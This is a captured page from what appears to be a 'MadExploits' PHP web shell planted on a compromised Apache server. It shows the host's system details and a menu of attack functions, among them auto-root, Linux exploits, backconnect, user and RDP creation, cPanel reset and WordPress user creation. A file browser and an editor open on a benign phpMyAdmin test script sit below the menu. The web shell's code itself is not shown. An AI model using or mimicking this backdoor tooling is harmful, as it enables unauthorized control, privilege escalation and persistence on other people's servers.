Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 216.73.216.89
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
restaurants /
var /
phpmyadmin /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
end-to-end
[ DIR ]
drwxr-xr-x
javascript
[ DIR ]
drwxr-xr-x
stubs
[ DIR ]
drwxr-xr-x
test_data
[ DIR ]
drwxr-xr-x
unit
[ DIR ]
drwxr-xr-x
README.rst
2.76
KB
-rw-r--r--
bootstrap-dist.php
829
B
-rw-r--r--
bootstrap-static.php
936
B
-rw-r--r--
ci-phplint
310
B
-rwxr-xr-x
config.e2e.inc.php
276
B
-rw-r--r--
doctum-config.php
894
B
-rw-r--r--
nginx.conf
3.63
KB
-rw-r--r--
php-fpm.conf
308
B
-rw-r--r--
php.ini
71.63
KB
-rw-r--r--
phpstan-constants.php
218
B
-rw-r--r--
start-local-server
1.7
KB
-rwxr-xr-x
stop-local-server
1.08
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : stop-local-server
#!/bin/sh # Do not run as CGI if [ -n "$GATEWAY_INTERFACE" ] ; then echo 'Can not invoke as CGI!' exit 1 fi set -e set -x if [ "$CI_MODE" != "selenium" ] ; then echo "Not in CI_MODE=selenium" exit 0 fi SELENIUM_TEMPDIR="$(cat /tmp/last_temp_dir_phpMyAdminTests)" if [ ! -z "$TESTSUITE_BROWSERSTACK_KEY" ] ; then # Stop BrowserStack Local forwarder ~/browserstack/BrowserStackLocal --daemon stop fi if [ -f ~/selenium-standalone.pid~ ] ; then # Stop selenium-standalone server kill $(cat ~/selenium-standalone.pid~) rm ~/selenium-standalone.pid~ fi if [ ! -z "${SELENIUM_TEMPDIR}" ] && [ -f "${SELENIUM_TEMPDIR}/nginx.pid" ]; then # Stop nginx server kill $(cat "${SELENIUM_TEMPDIR}/nginx.pid") fi if [ ! -z "${SELENIUM_TEMPDIR}" ] && [ -f "${SELENIUM_TEMPDIR}/php-fpm.pid" ]; then # Stop php-fpm server kill $(cat "${SELENIUM_TEMPDIR}/php-fpm.pid") fi if [ ! -z "${SELENIUM_TEMPDIR}" ] && [ -d "${SELENIUM_TEMPDIR}" ]; then # Delete the temporary folder rm -rf "${SELENIUM_TEMPDIR}" echo "Deleted temporary dir: ${SELENIUM_TEMPDIR}" fi
Close